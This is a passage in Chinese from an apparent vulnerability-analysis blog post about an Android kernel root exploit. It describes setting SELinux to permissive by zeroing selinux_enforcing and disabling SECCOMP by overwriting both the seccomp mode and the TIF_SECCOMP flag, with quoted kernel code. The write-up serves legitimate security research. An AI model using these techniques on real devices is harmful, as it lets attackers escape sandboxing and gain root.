这里原poc3作者最初想法是修改cred结构体中的void *security指向的task_security_struct结构体中的sid值，将进程从shell级别修改为更高特权级别，如sid=1。但在poc运行到此处时就卡住了无法继续运行，之后原作者采取了另一个方法也就是修改内核直接将SELinux的模式设置为permissive。

根据符号selinux_enforcing偏移获取地址，将该地址值写为0即可将SELinux状态改为permissive

SECCOMP

securecomputing mode——限制进程对系统调用的访问

SECCOMP对在adb用运行的poc无影响，但是会阻止捆绑在app上poc的系统调用。

在task_struct结构中找到：

struct seccomp {
    int mode;
    struct seccomp_filter *filter;
};

其中mode有两种模式：SECCOMP_MODE_STRICT和SECCOMP_MODE_FILTER，通常工作在filter模式下，当mode设置为0时，seccomp为禁用状态。

但是如果只将mode写为0不会禁用SECCOMP，原因是当SECCOMP运行时，在task_struct->thread_info.flags会被设置为TIF_SECCOMP，由于flag没有修改，内核认为SECCOMP处于开启状态，所以内核依旧会调用__secure_computing，进入该函数时会由于mode为0跳转到BUG()，原本的系统调用仍然不会执行。

int __secure_computing(const struct seccomp_data *sd)
{
    int mode = current->seccomp.mode;
......
    switch (mode) {
    case SECCOMP_MODE_STRICT:
        __secure_computing_strict(this_syscall);  /* may call do_exit */
        return 0;
    case SECCOMP_MODE_FILTER:
        return __seccomp_filter(this_syscall, sd, false);
    default:
        BUG();
    }
}

因此mode和flags都需要覆盖。

至此我们获得了完整的root权限。

总结

自身分析漏洞的经验不多，由于漏洞的利用过程不算复杂加上几乎稳定触发所以自己还算完整地把整个流程跟了一遍，最后还要感谢ghost师傅的指点。

文章来源: http://xz.aliyun.com/t/9273
如有侵权请联系:admin#unsafe.sh